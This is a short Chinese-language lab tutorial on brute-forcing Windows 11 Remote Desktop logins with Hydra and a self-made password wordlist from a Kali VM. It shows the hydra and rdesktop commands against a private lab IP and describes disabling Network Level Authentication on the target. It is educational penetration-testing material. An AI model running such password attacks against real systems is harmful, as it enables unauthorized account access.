一、实验题目：

          远程桌面爆破

二、实验内容：

           使用Hydra工具和口令字典进行远程桌面爆破

三、环境准备：

（1）kali虚拟机（9.0版本以上的hydra ）

（2）Windows 11×64 虚拟机（可以被远程连接的Windows系统均可）

四、实验步骤：

（1）在kali中创建密码字典（存放位置可自定义）：

命令：touch /home/kali/Desktop/password.txt

（2）编辑密码字典，存入数据：

命令：vim  /home/kali/Desktop/password.txt

 （3）查看待爆破主机IP（本实验使用Windows 11×64虚拟机）：

 

（4）对特定用户名进行爆破：

命令：hydra -l 15 -P /home/kali/Desktop/password.txt -V 192.168.32.128 rdp -t 4 -V

 

（5）尝试在kali中使用爆破出来的密码登陆Win11的远程桌面：

命令：rdesktop 192.168.32.128 

 此时发现登录失败，我们可以先去查看一下Windows 11 版本的远程设置：

可以看到Windows 11 中的网络级别身份验证连接没关，这才导致了远程登录失败。我们关闭后再次尝试登录：

 此时登录界面已经显示出来，尝试输入爆破获取到的账号密码。

 （6）成功登录Windows 11虚拟机： 

感兴趣的小伙伴赶快去尝试一下吧！

注意：本文章仅供学习和参考！

补充：

hydra介绍：